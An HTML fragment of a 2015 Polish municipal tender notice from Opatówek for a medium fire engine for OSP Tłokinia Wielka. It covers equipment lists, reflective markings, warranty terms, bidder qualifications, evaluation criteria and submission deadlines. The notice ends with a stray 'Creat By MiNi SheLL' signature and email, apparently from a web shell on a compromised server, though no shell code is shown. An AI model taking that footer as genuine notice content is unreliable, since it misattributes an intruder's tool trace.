- w kamerę monitorującą strefę z tyłu pojazdu. Kamera przystosowana do pracy w każdych warunkach atmosferycznych. Monitor przekazujący obraz, kolorowy o przekątnej min 7 cali, zamontowany w kabinie w zasięgu wzroku kierowcy. Minimum 3 punktowe załączanie: po wstecznym, na 10sek i na stałą obserwację .
IV. WYPOSAŻENIE.
4.1. Pojazd wyposażony w sprzęt standardowy, dostarczany z podwoziem, min: 
1 klin, klucz do kół, podnośnik hydrauliczny z dźwignią, trójkąt ostrzegawczy, apteczka, gaśnica, kamizelka ostrzegawcza ,wspornik zabezpieczenia podnoszonej kabiny, koło zapasowe.
4.2. Pojazd - wyposażony w zestaw sprzętu m.in :
- łom zwykły-1szt,
- łomo-wyciągacz-1szt,
- młotek 2 kg i 4 kg- po 1szt,
- siekiera-1szt,
- nożyce do drutu-1szt.
4.3. Na pojeździe zapewnione miejsce na przewożenie sprzętu zgodnie z Wymaganiami dla samochodów ratowniczo-gaśniczych
Zarządzenie Nr 8 Komendanta Głównego Państwowej Straży Pożarnej w sprawie gospodarki transportowej w jednostkach organizacyjnych Państwowej Straży Pożarnej z dnia 10 kwietnia 2008 r. (Dz. Urz. KGPSPoż Nr 1, poz. 8).
Załącznik nr 1 do wytycznych standaryzacji pojazdów pożarniczych i innych środków transportu Państwowej Straży Pożarnej z dnia 14.04.2011r. 
Szczegóły dotyczące rozmieszczenia sprzętu do uzgodnienia z użytkownikiem na etapie realizacji zamówienia. 
Zamawiający na etapie wykonania dostarczy wykaz wraz z posiadanym sprzętem do zamontowania.
Montaż sprzętu na koszt wykonawcy.
4.4. Samochód należy doposażyć w :
- z przodu pojazdu montaż wyciągarki elektrycznej o sile uciągu minimum 6 ton z liną o długości min. 25m, wraz z pokrowcem. (wyciągarkę dostarcza Zamawiający), 
- agregat prądotwórczy min 2,5 kVA,
- 2szt latarek kątowych typu Ex z ładowarkami lub równoważnych, 
- 2szt radiostacji przenośnych z ładowarkami, zamontowane w kabinie na specjalnym podeście.
V. OZNACZENIE.
- 5.1. Wykonanie oznakowania numerami operacyjnymi folią odblaskową zgodnie z obowiązującymi wymogami KG PSP według: Zarządzenie Nr 8 Komendanta Głównego Państwowej Straży Pożarnej w sprawie gospodarki transportowej w jednostkach organizacyjnych Państwowej Straży Pożarnej z dnia 10 kwietnia 2008 r. (Dz. Urz. KGPSPoż Nr 1, poz. 8),
- samochód powinien posiadać oznakowanie odblaskowe konturowe. Oznakowanie powinno znajdować się możliwie najbliżej poziomych i pionowych krawędzi samochodu.
VI. OGÓLNE.
6.1 Gwarancja: 
- 24 miesiące na silnik, podzespoły,
- 24 miesiące na zabudowę pożarniczą, 
- 72 miesięcy na perforacje nadwozia,
- 36 miesięcy na powłokę lakierniczą,
- 12 miesięcy na wyposażenie, 
- czas reakcji serwisu do 72 godzin, od czasu powiadomienia. 
6.2. Wykonawca dostarcza pojazd w dniu odbioru z pełnym zbiornikiem paliwa i środka pianotwórczego.
Wykonawca obowiązany jest do dostarczenia wraz z samochodem:
- instrukcje obsługi w języku polskim do samochodu, zabudowy pożarniczej i zainstalowanych urządzeń i wyposażenia,
- dokumentacji niezbędnej do zarejestrowania samochodu, wynikającej z ustawy Prawo o ruchu drogowym,
- dokumenty określone umową. 
6.3. Wykonawca zobowiązany jest do przeprowadzenia szkolenia z zakresu obsługi i konserwacji pojazdu dotyczącego części podwozia-silnika i pożarniczej dla minimum 5 osób w siedzibie wykonawcy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.14.42.10-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w kwocie 10 000,00 zł. Słownie: dziesięć tysięcy złotych</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca wykazał, że w okresie ostatnich 3 lat przed  
         upływem terminu składania ofert albo wniosków o dopuszczenie do udziału
         w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, 
         zrealizował co najmniej 1 dostawę pojazdu pożarniczego-wozu strażackiego o wartości 
         nie mniejszej niż 500 000,00 złotych. Wykazane zamówienie zostanie uznane, jeśli
         będzie poparte dokumentem - poświadczającym lub oświadczeniem Wykonawcy, jeżeli 
         z uzasadnionych przyczyn  o obiektywnym charakterze Wykonawca nie jest w stanie 
         uzyskać poświadczenia z którego będzie wynikać, że przedstawione dostawy zostały
         wykonane lub są wykonywane należycie (np. referencje, protokoły odbioru).   
         Poświadczenie w odniesieniu do nadal wykonywanych dostaw okresowych lub ciągłych 
         powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania 
         wniosków o dopuszczenie do udziału w postępowaniu albo ofert. Ocena spełniania tego 
         warunku udziału w postępowaniu zostanie dokonana zgodnie z formułą spełnia - 
         spełnia w oparciu o oświadczenie oraz dokument jakim jest wykaz wykonanych  
         głównych dostaw w okresie ostatnich 3 lat. Z treści wykazu i przedłożonych w ofercie 
         Zamawiający sprawdzi czy Wykonawca spełnia warunek.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia tego warunku na podstawie złożonego oświadczenia. Ocena spełniania warunku udziału w postępowaniu dokonana zostanie według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia tego warunku na podstawie złożonego oświadczenia. Ocena spełniania warunku udziału w postępowaniu dokonana zostanie według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia tego warunku na podstawie złożonego oświadczenia. Ocena spełniania warunku udziału w postępowaniu dokonana zostanie według formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- dane dotyczące podwykonawców i rodzaj powierzonej im części zamówienia (jeśli  Wykonawca przewiduje wykorzystanie podwykonawców na zasadach określonych w art.26 ust.2b ustawy Prawo zamówień publicznych) - załącznik nr 4 do formularza oferty;
- wykonawca wraz z ofertą zobowiązany jest złożyć listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art.24 ust.2 pkt.5, albo informację o tym, że nie należy do grupy kapitałowej stanowiącą załącznik nr 5 do formularza oferty;
- wypełniony opis oferowanego pojazdu - załącznik nr 6 do formularza oferty,
- zaakceptowany poprzez oświadczenie złożone na formularzu oferty punkt 3, 
projekt umowy jako załącznik nr 7 do formularza oferty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95.00</li>
<li>2 - Okres gwarancji - 5.00</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie zmiany w niniejszej Umowie mogą być dokonywane wyłącznie w formie pisemnej pod rygorem nieważności. Dopuszcza się zmianę umowy w sytuacji zmiany przepisów prawa powszechnie obowiązującego, jeżeli zmiana ta wpływa na zakres lub warunki wykonania przez Strony świadczeń wynikających z Umowy. Umowa podlegać będzie zmianie w zakresie, w jakim zmiany są niezbędne do dostosowania Umowy do zmienionych przepisów. Zamawiający przewiduje również możliwość zmiany umowy jeżeli WYKONAWCA na etapie składania oferty nie wskazał podwykonawcy do realizacji żadnej z części zamówienia, jednak w trakcie wykonywania umowy WYKONAWCA będzie chciał skorzystać z jego pomocy, to zgoda ZAMAWIAJĄCEGO na wprowadzenie podwykonawcy do umowy może nastąpić na zasadach określonych we wzorze umowy, który stanowi załącznik numer 7 do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.opatowek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Opatówku, 62 - 860 Opatówek, Plac Wolności 14, pokój numer 7 w godz.08:00 do 15:00..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.08.2015 godzina 09:45, miejsce: Urząd Gminy w Opatówku, 62 - 860 Opatówek, Plac Wolności 14, pokój numer 13.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot umowy jest współfinansowany przez Unię Europejską w ramach projektu Działanie 3.6. Poprawa bezpieczeństwa środowiskowego i ekologicznego Priorytetu III WRPO Środowisko Przyrodnicze o tytule Zakup średniego samochodu pożarniczego dla realizacji zadań w zakresie ochrony przeciwpożarowej na terenie gminy Opatówek przez OSP Tłokinia Wielka.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com